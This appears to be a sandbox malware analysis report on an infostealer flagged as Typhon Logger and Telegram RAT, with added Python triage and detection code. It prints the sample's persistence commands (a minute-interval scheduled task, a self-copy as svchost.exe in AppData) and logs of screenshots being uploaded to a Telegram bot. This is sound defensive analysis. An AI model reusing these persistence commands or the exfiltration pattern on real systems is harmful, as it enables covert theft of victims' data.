0d c3 49 92 e7 86 e7 c7 a4 1b ef bf f8 9d ab 83 b1 2d 7d 74 40 47 e0 16 ed 68 48 00 26 a9 97 f4 36 d3 f2 db b7 26 0b 5b d1 96 41 9c b5 ee a9 ea f8 a9 84 ef 21 0f 73 42 78 de be 67 a5 25 0e 1d 15 68
                                                                                      Data Ascii: ,DZQ*ERXG$'XMsI/jlto,Y;_iZO%UJ"Y!b(Dg@dI+p^*]ZLV.S@(awy+V"R?w6eDP} bak3HuI-}t@GhH&6&[A!sBxg%h
                                                                                      2023-05-22 17:51:45 UTC1231OUTData Raw: 2f cf 97 f8 14 63 5f d1 a6 38 d6 ba 5f 0a b1 79 da 95 62 32 53 df e5 b8 bc 5b 1c 9f 94 de 85 9d a9 4c bd 41 05 48 b7 77 2e 29 5e ad 4b ef 57 4f e8 08 13 f2 59 f2 4e 64 d3 1d ab 19 32 16 7a be 19 b7 7c f9 4d 8a c3 56 e8 dd a0 a2 ed b3 53 d7 9d 46 e6 97 bd 65 f2 2a 59 be 98 af 64 cf 8e d5 9c 1a 8f f9 a8 51 12 24 43 4a b1 b6 98 5c d0 be e0 9c 6c 70 e8 e6 1a 47 db ab 47 d3 fc 1f da 9a 19 94 02 be 04 9e e0 b4 1f 3b 16 ac 7a 12 a5 b0 66 db 78 f8 7b d2 f7 b8 23 de 72 21 5c 5a 43 75 53 33 57 ce 78 f1 58 e6 1d 57 ab 1d df dd 49 dc 19 42 07 0f fc 72 94 4a 26 4d 77 df c8 a5 70 e6 50 1a d4 87 4b 3e d9 2e 7b aa 39 e0 d5 e5 79 22 6f 79 8d 6b 4a 6c 15 95 de 85 07 bb dc ec ee ec 86 5d 3a ed a6 30 dc c9 e8 14 d4 db c2 51 fb bd 65 ab ba 2b e0 bd df d6 f1 78 db 0b cd b9 55
                                                                                      Data Ascii: /c_8_yb2S[LAHw.)^KWOYNd2z|MVSFe*YdQ$CJ\lpGG;zfx{#r!\ZCuS3WxXWIBrJ&MwpPK>.{9y"oykJl]:0Qe+xU
                                                                                      2023-05-22 17:51:45 UTC1247OUTData Raw: 04 04 99 bf 2e 9c 28 a1 64 93 bb d5 e9 95 8c 72 9f fd 27 dc d6 eb 8c 53 e7 1d 2a 12 ca ae c1 67 ba c4 71 dd ee d0 1c a8 fa 49 67 16 a7 29 7f 50 09 2f 0c 88 8e 12 e4 fe 80 f4 40 de 1b 94 ed 26 b8 6e 31 68 0f 89 8f 9a c4 2c a3 67 dc dc cd fd 98 da b5 15 5e 5d 02 b8 df 8b 7f f1 5a da dc b9 a5 8d 37 55 c1 6b ec cd 74 19 8f 5e db f5 b3 a9 eb b3 6f 4b a8 43 78 3c af 4b d0 ea 12 b9 36 c8 73 57 36 b5 32 4c 2a af 28 9a 99 70 fd f7 ad 92 17 2c 10 20 f6 eb e0 de ab 4e 83 5f ab f7 c2 79 e8 a0 8e 34 b4 4c 8e b7 79 12 67 6f 0a ac e1 83 bf 0f 09 0b a5 40 24 7c af 3a 0e 64 d9 73 87 9c 05 06 cb bb 19 fe 7e a5 5a 36 6f 1a 88 36 5b d0 7a 95 5a ff 80 d5 b4 20 11 6b 40 d6 35 c6 1f f1 1c 40 c3 1c af 92 bd d4 98 c3 9f 56 7d 41 44 73 c1 43 91 13 45 01 ad 9b 76 8e 9d 2f d9 3e 25
                                                                                      Data Ascii: .(dr'S*gqIg)P/@&n1h,g^]Z7Ukt^oKCx<K6sW62L*(p, N_y4Lygo@$|:ds~Z6o6[zZ k@5@V}ADsCEv/>%
                                                                                      2023-05-22 17:51:45 UTC1263OUTData Raw: 6b 49 77 a9 e2 cb 74 10 7f d5 c9 4a 13 f5 a4 b0 92 17 ba e4 a8 eb 5f d3 9c f5 dd 87 73 16 ee ca 93 0b db 04 72 f0 3f e5 6e 1d fc 4b fc 5a df 8c 89 ca f9 d2 e7 c8 61 23 ee 68 86 57 30 cb ac be 81 31 cf 24 1b 69 d9 fc bc be 30 4b 29 a8 f5 08 92 7c 79 bb 32 29 e4 e3 8b 07 27 ce af 20 51 da 4f 6e d1 4e 32 15 df be 11 28 45 b2 af 30 5c cb 51 b0 f6 e7 34 e1 0a 4c fb a3 ff da 89 c0 a1 37 ea f5 d5 3f b6 ca d1 bb 4c 08 5b e6 88 38 08 77 df 1e b4 7c 57 a7 bb 27 b8 f7 32 39 b8 34 cc ea 8f 6c c2 a7 d7 37 43 ce 87 ce a5 51 9b 47 8d 77 4a 44 d2 45 ae a7 fc 66 1b 14 df 4e fe ce aa 95 de fe 48 7f b2 5d f1 4f 2f 1d f4 c3 73 24 ac db 85 0e ea 20 ac 7b 13 fa 0d ef 89 1b 99 5b 7d 2b 3c 0c 68 2e 76 34 b1 a9 4f 77 50 8a 42 b7 4c 4e e7 dc e3 30 8e 30 26 7c 5e 69 59 dd 76 3e f7
                                                                                      Data Ascii: kIwtJ_sr?nKZa#hW01$i0K)|y2)' QOnN2(E0\Q4L7?L[8w|W'294l7CQGwJDEfNH]O/s$ {[}+<h.v4OwPBLN00&|^iYv>
                                                                                      2023-05-22 17:51:45 UTC1279OUTData Raw: ab 76 f7 7f 2c 75 24 b8 3d cc 39 90 dc 13 6f aa f7 80 7a f9 0b c5 91 9f 46 31 24 99 e3 ad fd 17 ee f0 07 fc a8 43 e0 06 76 83 25 8e c6 68 b1 ed e1 ff 15 3b ab 3b 7c e0 2c 9e 86 1f 88 f3 8f f5 65 fd 2e f7 14 14 a0 2a aa 34 ba 82 73 02 d3 1c 61 3e 2c 33 6c 25 2e 0c 93 2a 0b 8d ed da bf 27 6c 46 bc d7 6e ad 41 25 92 1f fa 40 8c 65 4f 69 b9 28 8b 09 5c 25 75 84 34 05 d1 34 b3 ee 89 cf 37 29 7a 51 6d ff c8 ed a0 77 b5 ac c7 b5 ba 09 52 a1 eb 3b 21 df 34 1e de 6b bc 3e c2 8b e0 eb 61 79 78 45 ee 4a be ff 61 92 8d 10 e4 48 98 00 7e 1e 6c bf 27 ed 8d 20 36 0f be 38 e1 a8 10 30 55 33 24 18 49 db 33 7a b2 26 ab 68 ec 4d 4c 67 8c 7f 25 72 e1 47 96 18 75 aa 30 af dd 59 eb 2e 41 eb ce 7a dd 41 4a 91 08 40 84 85 f4 f4 f9 6e ee 57 ff 1f 24 be dd a0 05 36 6f 76 c1 42 1a
                                                                                      Data Ascii: v,u$=9ozF1$Cv%h;;|,e.*4sa>,3l%.*'lFnA%@eOi(\%u447)zQmwR;!4k>ayxEJaH~l' 680U3$I3z&hMLg%rGu0Y.AzAJ@nW$6ovB
                                                                                      2023-05-22 17:51:45 UTC1295OUTData Raw: fa 7e 01 d7 db 4b 8a e3 0b 6a 4a 14 b9 65 24 d6 8b 25 98 d1 9e 03 a9 3c 6a b7 8f 80 fe fe c3 ea 8e 9f bd 25 e5 1b 35 1d bd 6e 9f 3b 06 6e ff ee 1b 45 ce f5 4e 7e c4 78 6b 9e 34 ab 30 9c b9 72 a9 2a 3a f4 f9 8b 7b d2 1f 95 83 02 17 44 dc 52 28 4a b0 66 f5 65 af b5 60 56 31 d5 4f 46 2a 68 64 ef 3d 79 ed d2 72 d1 78 de 41 86 3b 4f 55 aa 78 71 f7 9d c4 87 82 23 a0 f0 08 68 5b a7 36 a5 fb b9 35 ce d9 73 bd 65 45 5f 2b 7e 9c 3a 99 8c 8e a0 ea 90 2e c8 d1 7f 8a f6 db c8 a7 df fa 17 25 d8 5d 68 a6 5f 7d ff fa 91 8f 62 b1 d3 86 5f 6d 06 af 84 8f 6c 3a d1 35 6c a4 ba f9 c2 f9 d6 ad 73 b1 24 24 1d a4 a4 75 29 8e 31 f5 13 56 99 17 59 62 df c0 76 8f 00 83 23 20 99 29 6f 60 e3 c0 45 b2 95 f6 22 cf b7 dd c0 6d 05 49 eb 8f ce 6d f7 de 29 dd 2c 38 cb 97 f1 c8 85 44 41 9e
                                                                                      Data Ascii: ~KjJe$%<j%5n;nEN~xk40r*:{DR(Jfe`V1OF*hd=yrxA;OUxq#h[65seE_+~:.%]h_}b_ml:5ls$$u)1VYbv# )o`E"mIm),8DA
                                                                                      2023-05-22 17:51:45 UTC1309OUTData Raw: 0d 0a 2d 2d 36 35 30 35 35 63 61 66 2d 66 34 36 37 2d 34 32 64 31 2d 39 35 36 39 2d 61 64 32 34 30 32 30 30 65 37 31 62 2d 2d 0d 0a
                                                                                      Data Ascii: --65055caf-f467-42d1-9569-ad240200e71b--
                                                                                      2023-05-22 17:51:45 UTC1309INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 22 May 2023 17:51:45 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 516
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":730,"from":{"id":5869127049,"is_bot":true,"first_name":"MMtrade Bot","username":"mmtraded_bot"},"chat":{"id":1689002171,"first_name":"MM","last_name":"Trade","username":"mmtrade_001","type":"private"},"date":1684777905,"document":{"file_name":"C_UsersuserAppDataLocalTemp22_05_02023_21_42_13=user@12875.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIC2mRrq7HXldCr1R5s3lnlqqxBu_IZAAIEEAAClttYUygT05aYGSPGLwQ","file_unique_id":"AgADBBAAApbbWFM","file_size":553940}}}
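The exchange above ends with a ZIP local file header inside the upload body (the `PK..` bytes followed by `Screenshots/Screenshot_22.05.2023-21.41.55`), the closing multipart boundary, and a Telegram Bot API reply acknowledging the document. The following is an added triage example, not part of the Joe Sandbox report and not the sample's code: it reassembles the report's "Data Raw" hex chunks, carves ZIP local headers out of them, reads the boundary from the closing delimiter, and pulls the durable indicators (bot id, chat id, file identifiers) from the JSON reply. The two chunks and the JSON body are copied from the report; the function names are mine. One assumption drives the design: the report prints only a prefix of each chunk, so the carver works one chunk at a time and flags a file name that is shorter than its declared length instead of silently reading into the next chunk. The declared name length here is 46 bytes but only 42 survive, so the extension of that screenshot is not recoverable from this excerpt.

```python
"""Triage helper for a Joe Sandbox 'Data Raw' dump of a Telegram document upload.

Added example (not from the report). Carves ZIP local file headers out of the
multipart body, reads the closing boundary, and extracts indicators from the
Bot API reply. Each dumped chunk is truncated independently by the report, so
every chunk is parsed on its own and short fields are flagged, not guessed."""
import json
import re
import struct
from datetime import datetime, timezone

# Constructed from the report: tail of the chunk that carries the local file
# header (the bytes before 50 4b 03 04 are the end of the previous entry's
# deflate stream) and the final chunk with the closing multipart boundary.
RAW_CHUNKS = [
    "3e 3f 85 7b ce 1d 0d fd 1f 50 4b 03 04 14 00 00 00 08 00 63 9e b6 56 "
    "a8 00 4a 69 cd 3c 01 00 a7 49 01 00 2e 00 24 00 53 63 72 65 65 6e 73 "
    "68 6f 74 73 2f 53 63 72 65 65 6e 73 68 6f 74 5f 32 32 2e 30 35 2e 32 "
    "30 32 33 2d 32 31 2e 34 31 2e 35 35",
    "0d 0a 2d 2d 36 35 30 35 35 63 61 66 2d 66 34 36 37 2d 34 32 64 31 2d "
    "39 35 36 39 2d 61 64 32 34 30 32 30 30 65 37 31 62 2d 2d 0d 0a",
]

# Bot API reply body, copied verbatim from the report.
TELEGRAM_REPLY = (
    '{"ok":true,"result":{"message_id":730,"from":{"id":5869127049,"is_bot":true,'
    '"first_name":"MMtrade Bot","username":"mmtraded_bot"},"chat":{"id":1689002171,'
    '"first_name":"MM","last_name":"Trade","username":"mmtrade_001","type":"private"},'
    '"date":1684777905,"document":{"file_name":'
    '"C_UsersuserAppDataLocalTemp22_05_02023_21_42_13=user@12875.zip",'
    '"mime_type":"application/zip","file_id":'
    '"BQACAgQAAxkDAAIC2mRrq7HXldCr1R5s3lnlqqxBu_IZAAIEEAAClttYUygT05aYGSPGLwQ",'
    '"file_unique_id":"AgADBBAAApbbWFM","file_size":553940}}}'
)

ZIP_LOCAL_SIG = b"PK\x03\x04"
# Local file header (30 bytes, little endian): signature, version needed,
# flags, method, DOS time, DOS date, crc32, compressed size, uncompressed
# size, file name length, extra field length.
LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")
METHODS = {0: "stored", 8: "deflate"}


def dos_datetime(dos_time, dos_date):
    """Decode the MS-DOS timestamp of a ZIP header (local time of the writer)."""
    return datetime(
        1980 + (dos_date >> 9), (dos_date >> 5) & 0xF, dos_date & 0x1F,
        dos_time >> 11, (dos_time >> 5) & 0x3F, (dos_time & 0x1F) * 2,
    )


def carve_zip_entries(data):
    """Return every ZIP local file header found in one dumped chunk."""
    entries = []
    pos = data.find(ZIP_LOCAL_SIG)
    while pos != -1:
        hdr = data[pos:pos + LOCAL_HDR.size]
        if len(hdr) < LOCAL_HDR.size:
            break  # header itself is cut off by the dump
        (_sig, _ver, _flags, method, mtime, mdate, crc, csize, usize,
         nlen, _xlen) = LOCAL_HDR.unpack(hdr)
        name = data[pos + LOCAL_HDR.size:pos + LOCAL_HDR.size + nlen]
        entries.append({
            "offset": pos,
            "method": METHODS.get(method, f"unknown({method})"),
            "modified": dos_datetime(mtime, mdate),
            "crc32": f"{crc:08x}",
            "compressed_size": csize,
            "uncompressed_size": usize,
            "name": name.decode("utf-8", "replace"),
            "name_truncated": len(name) < nlen,  # dump ended before the name did
        })
        pos = data.find(ZIP_LOCAL_SIG, pos + len(ZIP_LOCAL_SIG))
    return entries


def multipart_boundary(data):
    """Boundary string from a closing CRLF--<boundary>--CRLF delimiter, if present."""
    m = re.search(rb"\r\n--([^\r\n]+?)--\r\n", data)
    return m.group(1).decode("ascii") if m else None


def triage_upload(chunks):
    """Parse each hex chunk on its own; chunks are truncated independently."""
    entries, boundary = [], None
    for index, chunk in enumerate(chunks):
        data = bytes.fromhex(chunk)  # fromhex ignores the spaces between bytes
        for entry in carve_zip_entries(data):
            entry["chunk"] = index
            entries.append(entry)
        boundary = multipart_boundary(data) or boundary
    return {"entries": entries, "boundary": boundary}


def telegram_indicators(body):
    """Bot, chat and document indicators from a Bot API message reply."""
    reply = json.loads(body)
    if not reply.get("ok") or "result" not in reply:
        raise ValueError("not a successful Bot API reply")
    result = reply["result"]
    return {
        "bot_id": result["from"]["id"],
        "bot_username": result["from"].get("username"),
        "chat_id": result["chat"]["id"],
        "chat_username": result["chat"].get("username"),
        "sent_at": datetime.fromtimestamp(result["date"], tz=timezone.utc),
        "file_name": result["document"]["file_name"],
        "file_size": result["document"]["file_size"],
        "file_unique_id": result["document"]["file_unique_id"],
    }


if __name__ == "__main__":
    upload = triage_upload(RAW_CHUNKS)
    for entry in upload["entries"]:
        print(entry)
    print("boundary:", upload["boundary"])
    print(telegram_indicators(TELEGRAM_REPLY))
```

Two checks fall out of the decoded fields. The DOS timestamp in the header decodes to 2023-05-22 19:51:06, two hours ahead of the 17:51:45 UTC in the reply and the Date header, which matches the 19:49:29 local start time in the process table below: the archive was written on the VM about two minutes after launch, just before the upload. The multipart boundary is a per-request GUID and is useless as an indicator; what is worth keeping is the bot id 5869127049, its username, the private chat id 1689002171, and the file name pattern, which embeds the VM's user name and a timestamp.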



                                                                                      Target ID:0
                                                                                      Start time:19:49:29
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      Imagebase:0x710000
                                                                                      File size:2164736 bytes
                                                                                      MD5 hash:22BA147ED50FF44941FE486426432115
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_TyphonLogger, Description: Yara detected Typhon Logger, Source: 00000000.00000002.399919891.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.399919891.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      Target ID:1
                                                                                      Start time:19:49:35
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      Imagebase:0x140000
                                                                                      File size:2164736 bytes
                                                                                      MD5 hash:22BA147ED50FF44941FE486426432115
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TyphonLogger, Description: Yara detected Typhon Logger, Source: 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TyphonLogger, Description: Yara detected Typhon Logger, Source: 00000001.00000002.519129931.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.519129931.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      Target ID:2
                                                                                      Start time:19:49:35
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Target ID:3
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Target ID:4
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Target ID:5
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Target ID:6
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                                                      Imagebase:0xbf0000
                                                                                      File size:185856 bytes
                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Target ID:7
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:tasklist
                                                                                      Imagebase:0x950000
                                                                                      File size:79872 bytes
                                                                                      MD5 hash:6B7D2FC3FB98B10A5F77B23DEF745F6F
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:8
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:9
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd.exe" /C copy "C:\Users\user\Desktop\SWIFT_USD_165092.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:10
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:11
                                                                                      Start time:19:49:37
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Imagebase:0xac0000
                                                                                      File size:2164736 bytes
                                                                                      MD5 hash:22BA147ED50FF44941FE486426432115
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 32%, ReversingLabs
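
The records above (Targets 2 to 11) show the sample's persistence chain end to end: cmd.exe creates C:\Users\user\AppData\Roaming\svchost, schtasks.exe registers a task named "Nafifas" that launches svchost.exe from that directory every minute, tasklist is run, the sample copies itself over that path, and the copy starts. The Python below is an added triage example, not part of the report or of Joe Sandbox; it replays those command lines (constructed here from the listing, with the outer quotes restored) through three rules a detection engineer would derive from this tree: a schtasks /create with a minute schedule whose action lives in a user-writable directory, a binary carrying a Windows system name executing outside System32 or SysWOW64, and a copy that plants a file under such a name. The rule names, the five-minute threshold and the impersonated-name list are this example's assumptions.

```python
"""Triage rules replayed over the process tree above.

Added example for this report; not Joe Sandbox code. PROCS is constructed
from the report's command lines (outer quotes restored); the rule names,
thresholds and impersonated-name list are this example's assumptions.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
# Names attackers reuse for dropped payloads (assumption: illustrative subset).
BENIGN_SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe",
                       "services.exe", "smss.exe", "wininit.exe", "dllhost.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


@dataclass(frozen=True)
class Proc:
    target_id: int
    path: str
    cmdline: str


APPDATA_SVCHOST = r"C:\Users\user\AppData\Roaming\svchost\svchost.exe"
SCHTASKS_LINE = r'''schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f'''

# Constructed from the report's process list (Targets 0-20, conhost omitted).
PROCS = [
    Proc(0, r"C:\Users\user\Desktop\SWIFT_USD_165092.exe", r"C:\Users\user\Desktop\SWIFT_USD_165092.exe"),
    Proc(2, r"C:\Windows\SysWOW64\cmd.exe", r'"cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost"'),
    Proc(4, r"C:\Windows\SysWOW64\cmd.exe", '"cmd.exe" /C ' + SCHTASKS_LINE),
    Proc(6, r"C:\Windows\SysWOW64\schtasks.exe", SCHTASKS_LINE),
    Proc(7, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    Proc(9, r"C:\Windows\SysWOW64\cmd.exe",
         r'"cmd.exe" /C copy "C:\Users\user\Desktop\SWIFT_USD_165092.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe"'),
    Proc(11, APPDATA_SVCHOST, APPDATA_SVCHOST),
    Proc(14, APPDATA_SVCHOST, APPDATA_SVCHOST),
    Proc(17, r"C:\Windows\SysWOW64\cmd.exe", '"cmd.exe" /C ' + SCHTASKS_LINE),
    Proc(19, r"C:\Windows\SysWOW64\schtasks.exe", SCHTASKS_LINE),
    Proc(20, r"C:\Windows\SysWOW64\cmd.exe",
         r'"cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe"'),
]


def parse_schtasks_create(cmdline: str) -> Optional[Tuple[Optional[str], Optional[int], Optional[str], Optional[str]]]:
    """Return (schedule, modifier, task name, action) for a schtasks /create, else None."""
    low = cmdline.lower()
    if "schtasks" not in low or "/create" not in low:
        return None
    sc = re.search(r"/sc\s+(\w+)", cmdline, re.I)
    mo = re.search(r"/mo\s+(\d+)", cmdline, re.I)
    tn = re.search(r"""/tn\s+["']?([^"'\s]+)""", cmdline, re.I)
    # The action here is double-quoted around a single-quoted path; strip both.
    tr = re.search(r"""/tr\s+["']+([^"']+)""", cmdline, re.I)
    return (sc.group(1).lower() if sc else None,
            int(mo.group(1)) if mo else None,
            tn.group(1) if tn else None,
            tr.group(1).strip() if tr else None)


def in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def in_system_dir(path: str) -> bool:
    parent = ntpath.dirname(path).lower()
    return any(parent == d or parent.startswith(d + "\\") for d in SYSTEM_DIRS)


COPY_RE = re.compile(r'\bcopy\s+"([^"]+)"\s+"([^"]+)"', re.I)


def triage(procs: List[Proc]) -> List[Tuple[int, str, str]]:
    """Return (target_id, rule, detail) for every record a rule fires on."""
    findings = []
    for p in procs:
        name = ntpath.basename(p.path).lower()
        st = parse_schtasks_create(p.cmdline)
        if st:
            sc, mo, tn, tr = st
            # A task firing every few minutes from AppData or Temp is the
            # re-launch loop seen here; schtasks defaults /mo to 1 when absent.
            if sc == "minute" and (mo or 1) <= 5 and tr and in_user_writable(tr):
                findings.append((p.target_id, "minute-task-user-writable", f"{tn} -> {tr} every {mo} min"))
        if name in BENIGN_SYSTEM_NAMES and not in_system_dir(p.path):
            findings.append((p.target_id, "system-name-outside-system-dir", p.path))
        m = COPY_RE.search(p.cmdline)
        if m and in_user_writable(m.group(2)) and ntpath.basename(m.group(2)).lower() in BENIGN_SYSTEM_NAMES:
            findings.append((p.target_id, "copy-to-benign-system-name", f"{m.group(1)} -> {m.group(2)}"))
    return findings


if __name__ == "__main__":
    for tid, rule, detail in triage(PROCS):
        print(f"target {tid:>2}: {rule}: {detail}")
```

Run against the constructed records, the schtasks rule fires on both the cmd.exe wrappers (Targets 4 and 17) and the schtasks.exe children (6 and 19), the name rule on the two svchost.exe instances started from AppData (11 and 14), and the copy rule on Targets 9 and 20. Matching the wrapper as well as the child is deliberate: if the schtasks.exe spawn is missing from a given log source, the `/C schtasks /create` in the parent's command line is still there.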

                                                                                      Target ID:14
                                                                                      Start time:19:49:49
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Imagebase:0x340000
                                                                                      File size:2164736 bytes
                                                                                      MD5 hash:22BA147ED50FF44941FE486426432115
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TyphonLogger, Description: Yara detected Typhon Logger, Source: 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
